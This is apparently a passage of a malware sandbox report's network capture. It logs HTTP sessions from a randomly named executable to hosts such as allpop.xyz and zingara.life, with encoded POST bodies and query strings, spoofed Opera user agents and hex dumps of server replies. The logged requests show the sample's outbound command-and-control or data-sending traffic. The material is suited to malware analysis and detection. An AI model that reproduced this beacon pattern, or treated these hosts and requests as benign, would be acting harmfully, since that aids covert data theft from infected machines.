                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                36192.168.11.3049857162.0.238.43806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:04:44.737786055 CEST344OUTGET /w6me/?nhl=ZQVtGrOiyfGmX0Bj7aOLb6McZZRaKXEecgRoMf1rX1qYBYk54P5+D+BVBTSMCHRrFOCnGQPC2mKGS9yi7bLDo6yarw5+jQ0DwziRuqiIpXFZxXsIN5XtUDU=&9X=EvKH2xeP-DpP307P HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.allpop.xyz
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Oct 9, 2024 13:04:44.910360098 CEST548INHTTP/1.1 404 Not Found
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:04:44 GMT
                                                                                                                                                                Server: Apache
                                                                                                                                                                Content-Length: 389
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                37192.168.11.304985823.227.38.74806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:04:50.135679007 CEST607OUTPOST /c0mi/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.zingara.life
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 200
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.zingara.life
                                                                                                                                                                Referer: http://www.zingara.life/c0mi/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 79 6f 70 76 4b 67 57 4a 41 4d 4a 56 53 54 76 72 6a 6a 4b 4e 2b 63 78 79 67 30 69 7a 33 71 73 30 4d 34 6c 75 45 39 51 42 46 68 73 6a 31 66 54 42 70 34 5a 50 74 38 76 75 68 67 4e 74 45 79 53 47 37 63 6d 66 58 45 2f 4c 48 56 4a 69 32 30 57 65 64 35 6c 68 4e 4c 66 77 7a 69 42 48 32 52 79 6b 49 65 63 4d 70 48 2b 4b 70 43 70 69 5a 68 37 55 4e 79 45 61 33 56 5a 54 2f 59 35 56 74 46 35 38 77 4e 42 39 64 72 7a 48 67 59 54 42 65 63 69 5a 57 70 6c 71 44 31 68 37 74 64 73 4e 55 46 50 37 51 30 77 30 72 4e 45 4e 31 48 46 36 6c 5a 54 77 75 4c 67 2f 53 4a 5a 68 6e 44 51 57 42 30 74 78 4a 77 3d 3d
                                                                                                                                                                Data Ascii: nhl=yopvKgWJAMJVSTvrjjKN+cxyg0iz3qs0M4luE9QBFhsj1fTBp4ZPt8vuhgNtEySG7cmfXE/LHVJi20Wed5lhNLfwziBH2RykIecMpH+KpCpiZh7UNyEa3VZT/Y5VtF58wNB9drzHgYTBeciZWplqD1h7tdsNUFP7Q0w0rNEN1HF6lZTwuLg/SJZhnDQWB0txJw==
                                                                                                                                                                Oct 9, 2024 13:04:50.524318933 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:04:50 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-sorting-hat-podid: 156
                                                                                                                                                                x-sorting-hat-shopid: 68129128605
                                                                                                                                                                vary: Accept-Encoding,Accept
                                                                                                                                                                x-frame-options: DENY
                                                                                                                                                                x-shopid: 68129128605
                                                                                                                                                                x-shardid: 156
                                                                                                                                                                content-language: en-IN
                                                                                                                                                                x-shopify-nginx-no-cookies: 0
                                                                                                                                                                set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:50 GMT; SameSite=Lax
                                                                                                                                                                set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:50 GMT; SameSite=Lax
                                                                                                                                                                set-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 11:04:50 GMT; SameSite=Lax
                                                                                                                                                                set-cookie: _shopify_y=1df4171f-fe86-4c92-af19-6810bd200ea4; Expires=Thu, 09-Oct-25 11:04:50 GMT; Domain=zingara.life; Path=/; SameSite=Lax
                                                                                                                                                                set-cookie: _shopify_s=7853b78d-753d-4f3f-a5db-c02e04aff0ef; Expires=Wed, 09-Oct-24 11:34:50 GMT; Domain=zingara.life; Path=/; SameSite=
                                                                                                                                                                Data Raw:
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Oct 9, 2024 13:04:50.524389029 CEST1255INData Raw: 61 78 0d 0a 78 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 36 35 33 31 30 61 66 33 2d 64 61 34 32 2d 34 35 33 66 2d 62 66 36 30 2d 30 65 31 36 63 64 65 37 64 62 34 32 2d 31 37 32 38 34 37 31 38 39 30 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20
                                                                                                                                                                Data Ascii: axx-request-id: 65310af3-da42-453f-bf60-0e16cde7db42-1728471890server-timing: processing;dur=226content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontrol
                                                                                                                                                                Oct 9, 2024 13:04:50.524513960 CEST1289INData Raw: 36 37 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c 68 07 dd 29 5b b6 2a a7 6b d3 76 1b 90 76 c5 3a 60 d8 de 68 89 b6 d8 c8 a2 46 d1 76 d2 a2 ff 7d 87 a4 28 4b 89 d3 ae 09 1a f3 72 ae df b9 f0 b8 f9 0f af 7e bf fc
                                                                                                                                                                Data Ascii: 679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]
                                                                                                                                                                Oct 9, 2024 13:04:50.524524927 CEST380INData Raw: 16 bc 9c 59 a6 d0 8f 63 90 60 e4 5d 4d cc 9a ee fe 71 74 22 7e d0 09 38 4e c5 c7 af 97 2f 5f 63 95 22 e6 4a b7 de 95 13 0f 07 ea b1 f9 c8 19 54 99 9e 6e 9d 8b 3c 50 38 7c 1b 24 70 3d 9d b9 f1 02 5d da 95 bf 9c cf 15 3e f0 e1 c6 00 d3 0c 36 fd 42
                                                                                                                                                                Data Ascii: Yc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tVtsB


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                38192.168.11.304985923.227.38.74806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:04:52.769571066 CEST627OUTPOST /c0mi/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.zingara.life
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 220
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.zingara.life
                                                                                                                                                                Referer: http://www.zingara.life/c0mi/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 79 6f 70 76 4b 67 57 4a 41 4d 4a 56 41 43 66 72 68 45 32 4e 70 73 78 31 76 55 69 7a 2b 4b 73 77 4d 34 70 75 45 38 6b 52 46 54 49 6a 31 2f 6a 42 75 36 78 50 68 63 76 75 71 41 4e 73 4a 53 53 42 37 64 62 71 58 46 76 4c 48 56 31 69 32 31 4b 65 64 71 64 69 4e 62 66 79 36 43 42 42 38 78 79 6b 49 65 63 4d 70 47 61 67 70 43 52 69 59 51 4c 55 4d 58 6b 5a 72 46 5a 4d 34 59 35 56 36 56 35 77 77 4e 41 6f 64 71 75 71 67 65 58 42 65 59 6d 5a 57 34 6c 6c 4a 31 68 39 70 64 74 74 46 47 7a 78 65 48 45 34 34 2b 6c 4b 31 47 5a 66 67 4f 69 71 7a 49 55 39 42 70 6c 4d 37 43 39 2b 44 32 73 71 55 37 6b 78 38 50 55 58 74 42 77 31 77 45 37 76 50 32 74 52 46 49 63 3d
                                                                                                                                                                Data Ascii: nhl=yopvKgWJAMJVACfrhE2Npsx1vUiz+KswM4puE8kRFTIj1/jBu6xPhcvuqANsJSSB7dbqXFvLHV1i21KedqdiNbfy6CBB8xykIecMpGagpCRiYQLUMXkZrFZM4Y5V6V5wwNAodquqgeXBeYmZW4llJ1h9pdttFGzxeHE44+lK1GZfgOiqzIU9BplM7C9+D2sqU7kx8PUXtBw1wE7vP2tRFIc=
                                                                                                                                                                Oct 9, 2024 13:04:53.654623032 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:04:53 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-sorting-hat-podid: 156
                                                                                                                                                                x-sorting-hat-shopid: 68129128605
                                                                                                                                                                vary: Accept-Encoding,Accept
                                                                                                                                                                x-frame-options: DENY
                                                                                                                                                                x-shopid: 68129128605
                                                                                                                                                                x-shardid: 156
                                                                                                                                                                content-language: en-IN
                                                                                                                                                                x-shopify-nginx-no-cookies: 0
                                                                                                                                                                set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:52 GMT; SameSite=Lax
                                                                                                                                                                set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:52 GMT; SameSite=Lax
                                                                                                                                                                set-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 11:04:53 GMT; SameSite=Lax
                                                                                                                                                                set-cookie: _shopify_y=4c54a4ea-beee-4680-9a75-6cf216a3001a; Expires=Thu, 09-Oct-25 11:04:53 GMT; Domain=zingara.life; Path=/; SameSite=Lax
                                                                                                                                                                set-cookie: _shopify_s=0d286487-46fd-43a6-a5f2-12cc4ec5e7eb; Expires=Wed, 09-Oct-24 11:34:53 GMT; Domain=zingara.life; Path=/; SameSite=
                                                                                                                                                                Data Raw:
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Oct 9, 2024 13:04:53.654690027 CEST1251INData Raw: 61 78 0d 0a 78 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 62 66 62 30 31 31 63 37 2d 30 65 32 30 2d 34 33 39 66 2d 39 31 63 62 2d 37 30 30 32 35 35 34 62 30 32 66 66 2d 31 37 32 38 34 37 31 38 39 32 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20
                                                                                                                                                                Data Ascii: axx-request-id: bfb011c7-0e20-439f-91cb-7002554b02ff-1728471892server-timing: processing;dur=734content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontrol
                                                                                                                                                                Oct 9, 2024 13:04:53.654738903 CEST1289INData Raw: 36 37 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c 68 07 dd 29 5b b6 2a a7 6b d3 76 1b 90 76 c5 3a 60 d8 de 68 89 b6 d8 c8 a2 46 d1 76 d2 a2 ff 7d 87 a4 28 4b 89 d3 ae 09 1a f3 72 ae df b9 f0 b8 f9 0f af 7e bf fc
                                                                                                                                                                Data Ascii: 679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]
                                                                                                                                                                Oct 9, 2024 13:04:53.654752970 CEST380INData Raw: 16 bc 9c 59 a6 d0 8f 63 90 60 e4 5d 4d cc 9a ee fe 71 74 22 7e d0 09 38 4e c5 c7 af 97 2f 5f 63 95 22 e6 4a b7 de 95 13 0f 07 ea b1 f9 c8 19 54 99 9e 6e 9d 8b 3c 50 38 7c 1b 24 70 3d 9d b9 f1 02 5d da 95 bf 9c cf 15 3e f0 e1 c6 00 d3 0c 36 fd 42
                                                                                                                                                                Data Ascii: Yc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tVtsB


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                39192.168.11.304986023.227.38.74806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:04:55.408767939 CEST1289OUTPOST /c0mi/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.zingara.life
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 3336
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.zingara.life
                                                                                                                                                                Referer: http://www.zingara.life/c0mi/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 79 6f 70 76 4b 67 57 4a 41 4d 4a 56 41 43 66 72 68 45 32 4e 70 73 78 31 76 55 69 7a 2b 4b 73 77 4d 34 70 75 45 38 6b 52 46 54 41 6a 31 73 72 42 75 63 35 50 67 63 76 75 6a 67 4e 68 4a 53 54 45 37 64 44 75 58 41 33 62 48 54 78 69 33 58 75 65 4a 4c 64 69 47 62 66 79 34 43 42 41 32 52 79 4c 49 65 73 49 70 47 4b 67 70 43 52 69 59 54 6a 55 4c 43 45 5a 37 31 5a 54 2f 59 35 52 74 46 35 63 77 4a 73 34 64 71 61 63 67 62 6a 42 65 70 32 5a 56 4b 4e 6c 4a 31 68 39 39 74 74 73 46 47 2f 79 65 48 63 53 34 36 59 6f 31 33 39 66 68 34 44 76 30 37 73 30 64 34 4a 51 7a 79 4a 49 58 41 73 75 55 73 55 4f 74 2b 55 52 71 78 30 2f 2f 6b 50 56 4d 56 4e 45 65 76 54 79 69 67 2b 63 57 73 32 46 76 35 43 33 75 31 31 6d 37 70 55 69 53 78 41 64 54 52 78 57 71 76 35 71 51 2f 4b 72 76 4f 6d 2f 32 56 4b 74 6c 7a 7a 73 55 2b 51 30 61 48 43 6a 4c 50 53 51 71 46 51 58 74 75 64 4b 35 71 55 49 52 77 48 65 68 79 4c 66 41 39 65 64 4c 6c 73 76 44 71 46 6e 65 6a 45 66 6c 44 46 2f 77 47 52 61 74 59 45 49 59 49 36 4a 35 30 70 7a 73 55 [TRUNCATED]
                                                                                                                                                                Data Ascii: nhl=yopvKgWJAMJVACfrhE2Npsx1vUiz+KswM4puE8kRFTAj1srBuc5PgcvujgNhJSTE7dDuXA3bHTxi3XueJLdiGbfy4CBA2RyLIesIpGKgpCRiYTjULCEZ71ZT/Y5RtF5cwJs4dqacgbjBep2ZVKNlJ1h99ttsFG/yeHcS46Yo139fh4Dv07s0d4JQzyJIXAsuUsUOt+URqx0//kPVMVNEevTyig+cWs2Fv5C3u11m7pUiSxAdTRxWqv5qQ/KrvOm/2VKtlzzsU+Q0aHCjLPSQqFQXtudK5qUIRwHehyLfA9edLlsvDqFnejEflDF/wGRatYEIYI6J50pzsUmhxCluvbmFxHsAg4WyhhN1bRolMOzNBhAPu2CX5UiixM4dqNcPoP/wBhogW8fXpHUh9Q4hPAJX2nu/T3QrsQihPYqZLHQrQQiycFezV6Aiu2Fy/D2GSDkUl57MH8W5ofyD+prnFW0eQ0w3cpRdM3ikxGlzrPeMClPyGROoHsCZerzRaYGTY9qw+DgbHLxz3a8KeEPA+bpqlvqDJq3eqPRhAvg6NGXhwYiQoXlA70UaPGrvv1KDQt2tmCFqkeK0JcixUvmYtwLO+kuF6kcOYpY7SOLTTpy/3q9c0JNamQ88NSpt1FtzcfMCT4uUCbjC8qco6pS92n4hq+v+vLYpmxf6ErrHZkiWEee9Ph6Ta9X8cFA+mu0yoyzNISfpvbZEo9sbvUQqUnKtfbiSwp9q+fiErNxW3Z9JbKh0yRGKNyvnR1Ch74snJNbnIwfzxsxuFlpD9Vazr5ALNDfc647LvRkC5DK3NpPXCwrcCfskhGe288kF6D6AibxERYgxlonAJHqhYGAcu9fwdZFYlV+Ja7k/34FNLfBMv
                                                                                                                                                                Oct 9, 2024 13:04:55.408817053 CEST2455OUTData Raw: 57 44 32 36 79 55 6a 39 74 37 6d 61 4c 6e 50 66 69 34 51 77 6d 76 6a 78 32 6d 2f 59 46 77 73 49 39 55 55 77 4d 47 35 78 6a 33 6d 75 7a 6c 42 4e 7a 79 48 79 79 31 55 55 67 5a 6b 77 35 2b 69 4a 43 6d 72 70 6e 49 53 37 46 2f 63 78 6a 31 71 52 39 7a
                                                                                                                                                                Data Ascii: WD26yUj9t7maLnPfi4Qwmvjx2m/YFwsI9UUwMG5xj3muzlBNzyHyy1UUgZkw5+iJCmrpnIS7F/cxj1qR9zt+MwlksiBFy1X4qiD+Q7Zc7SuFbmMcwp8Sw531jQHzx0tZCRRqe/BJK3Wi7+Lm3M2+VtZVxTIZg2M1tJG3UPrceUWTooOPeNgiJr/twU7sKgXHVjIqGhjFIBA8vTPU6KbbwRHab83L6YiIvHpaLexpjSGF2jLLEQ4
                                                                                                                                                                Oct 9, 2024 13:04:55.775000095 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:04:55 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-sorting-hat-podid: 156
                                                                                                                                                                x-sorting-hat-shopid: 68129128605
                                                                                                                                                                vary: Accept-Encoding,Accept
                                                                                                                                                                x-frame-options: DENY
                                                                                                                                                                x-shopid: 68129128605
                                                                                                                                                                x-shardid: 156
                                                                                                                                                                content-language: en-IN
                                                                                                                                                                x-shopify-nginx-no-cookies: 0
                                                                                                                                                                set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:55 GMT; SameSite=Lax
                                                                                                                                                                set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 11:04:55 GMT; SameSite=Lax
                                                                                                                                                                set-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 11:04:55 GMT; SameSite=Lax
                                                                                                                                                                set-cookie: _shopify_y=101d33f6-59dc-43c5-a1bb-c6ef86b34ba2; Expires=Thu, 09-Oct-25 11:04:55 GMT; Domain=zingara.life; Path=/; SameSite=Lax
                                                                                                                                                                set-cookie: _shopify_s=9dea918b-c5fe-4834-b024-5be6d8b36844; Expires=Wed, 09-Oct-24 11:34:55 GMT; Domain=zingara.life; Path=/; SameSite=
                                                                                                                                                                Data Raw:
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Oct 9, 2024 13:04:55.775073051 CEST1283INData Raw: 61 78 0d 0a 78 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 65 33 31 35 31 66 62 32 2d 30 36 62 63 2d 34 37 63 35 2d 61 33 35 64 2d 35 30 38 37 35 39 66 32 62 36 66 38 2d 31 37 32 38 34 37 31 38 39 35 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20
                                                                                                                                                                Data Ascii: axx-request-id: e3151fb2-06bc-47c5-a35d-508759f2b6f8-1728471895server-timing: processing;dur=172content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontrol
                                                                                                                                                                Oct 9, 2024 13:04:55.775221109 CEST1289INData Raw: 36 37 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c 68 07 dd 29 5b b6 2a a7 6b d3 76 1b 90 76 c5 3a 60 d8 de 68 89 b6 d8 c8 a2 46 d1 76 d2 a2 ff 7d 87 a4 28 4b 89 d3 ae 09 1a f3 72 ae df b9 f0 b8 f9 0f af 7e bf fc
                                                                                                                                                                Data Ascii: 679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]
                                                                                                                                                                Oct 9, 2024 13:04:55.775304079 CEST375INData Raw: 16 bc 9c 59 a6 d0 8f 63 90 60 e4 5d 4d cc 9a ee fe 71 74 22 7e d0 09 38 4e c5 c7 af 97 2f 5f 63 95 22 e6 4a b7 de 95 13 0f 07 ea b1 f9 c8 19 54 99 9e 6e 9d 8b 3c 50 38 7c 1b 24 70 3d 9d b9 f1 02 5d da 95 bf 9c cf 15 3e f0 e1 c6 00 d3 0c 36 fd 42
                                                                                                                                                                Data Ascii: Yc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tVtsB
                                                                                                                                                                Oct 9, 2024 13:04:55.775315046 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                40192.168.11.304986123.227.38.74806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:04:58.045490026 CEST346OUTGET /c0mi/?9X=EvKH2xeP-DpP307P&nhl=/qBPJVDnAuMkCGTP/HS85thBhnm7sJojL9dSRPkeMTtigtz0zshBu+rciWkGPxuF6vbDEUTteEoy5hWhe9VJGILzyD9w1h6pHrUb6h3XoF15PEDkBz8gt0Y= HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.zingara.life
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Oct 9, 2024 13:04:58.270699024 CEST1289INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:04:58 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                x-sorting-hat-podid: 156
                                                                                                                                                                x-sorting-hat-shopid: 68129128605
                                                                                                                                                                x-storefront-renderer-rendered: 1
                                                                                                                                                                location: https://zingara.life/c0mi?9X=EvKH2xeP-DpP307P&nhl=/qBPJVDnAuMkCGTP/HS85thBhnm7sJojL9dSRPkeMTtigtz0zshBu+rciWkGPxuF6vbDEUTteEoy5hWhe9VJGILzyD9w1h6pHrUb6h3XoF15PEDkBz8gt0Y=
                                                                                                                                                                x-redirect-reason: https_required
                                                                                                                                                                x-frame-options: DENY
                                                                                                                                                                content-security-policy: frame-ancestors 'none';
                                                                                                                                                                x-shopid: 68129128605
                                                                                                                                                                x-shardid: 156
                                                                                                                                                                vary: Accept
                                                                                                                                                                powered-by: Shopify
                                                                                                                                                                server-timing: processing;dur=9;desc="gc:1", db;dur=2, db_async;dur=6.607, asn;desc="174", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="lxkz", requestID;desc="12b50a6d-452b-4138-9b0c-26fd9e3c7d39-1728471898"
                                                                                                                                                                x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1
                                                                                                                                                                x-request-id: 12b50a6d-452b-4138-9b0c-26fd9e3c7d39-1728471898
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aEMl2x6I6aIeOEpdRzTkER10TjldZ%2BzcqOM5oDlsaMmCnCwNWxo7hJd2x8hPSFI06TkppBxzVNDsSdfDVPUGBbnmREWAgIrZH%2BON7lPhy%2BPsbvc1iMtuMePcb2oPeOPawiw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","
                                                                                                                                                                Data Raw:
